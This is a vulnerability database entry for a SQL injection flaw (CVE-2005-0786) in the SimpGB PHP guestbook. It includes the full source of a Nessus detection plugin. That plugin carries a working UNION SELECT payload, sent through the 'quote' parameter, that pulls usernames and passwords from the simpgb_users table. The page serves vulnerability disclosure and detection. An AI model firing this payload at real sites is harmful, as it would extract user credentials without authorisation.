Vulnerabilities > CVE-2005-0786 - SQL Injection vulnerability in Simpgb 1.0

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
simpgb
nessus
exploit available
NVD
Published: 2005-03-14
Updated: 2017-07-11

Summary

SQL injection vulnerability in gb_new.inc in SimpGB allows remote attackers to execute arbitrary SQL commands via the quote parameter to guestbook.php.

Vulnerable Configurations

Part Description Count
Application
Simpgb
1

Exploit-Db

descriptionSimpGB 1.0 Guestbook.PHP SQL Injection Vulnerability. CVE-2005-0786. Webapps exploit for php platform
idEDB-ID:25224
last seen2016-02-03
modified2005-03-14
published2005-03-14
reportervisus
sourcehttps://www.exploit-db.com/download/25224/
titleSimpGB 1.0 Guestbook.PHP SQL Injection Vulnerability

Nessus

NASL familyCGI abuses
NASL idSIMPGB_SQL.NASL
descriptionThe remote host is running SimpGB, a web-based guestbook application written in PHP. The version of SimpGB installed on the remote host fails to sanitize user input to the
last seen2020-06-01
modified2020-06-02
plugin id17328
published2005-03-15
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/17328
titleSimpGB guestbook.php quote Parameter SQL Injection
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(17328);
  script_version("1.17");

  script_cve_id("CVE-2005-0786");
  script_bugtraq_id(12801);

  script_name(english:"SimpGB guestbook.php quote Parameter SQL Injection");
  script_summary(english:"Checks for SQL injection in SimpGB");
 
  script_set_attribute(  attribute:"synopsis",  value:
"The remote web server contains a PHP application that is vulnerable to
a SQL injection attack."  );
  script_set_attribute(  attribute:"description",   value:
"The remote host is running SimpGB, a web-based guestbook application
written in PHP.

The version of SimpGB installed on the remote host fails to sanitize
user input to the 'quote' parameter of the 'guestbook.php' script
before using it in SQL queries.  An unauthenticated, remote attacker
can leverage this issue to manipulate database queries to read or
write confidential data as well as potentially execute arbitrary
commands on the remote web server."  );
  script_set_attribute(
    attribute:"see_also", 
    value:"https://seclists.org/bugtraq/2005/Mar/243"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Unknown at this time."
  );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/03/15");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/03/13");
 script_cvs_date("Date: 2018/11/15 20:50:18");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();
 
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_family(english:"CGI abuses");

  script_dependencie("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/simpgb", "/gb", "/guestbook", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  url = string(dir, "/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201");
  res = http_send_recv3(method:"GET", item:url, port:port);
  if (isnull(res)) exit(0);

  if (egrep(string:res[2], pattern:"Am 0000-00-00 00:00:00 schrieb "))
  {
    security_hole(port);
    set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
    exit(0);
  }
}

References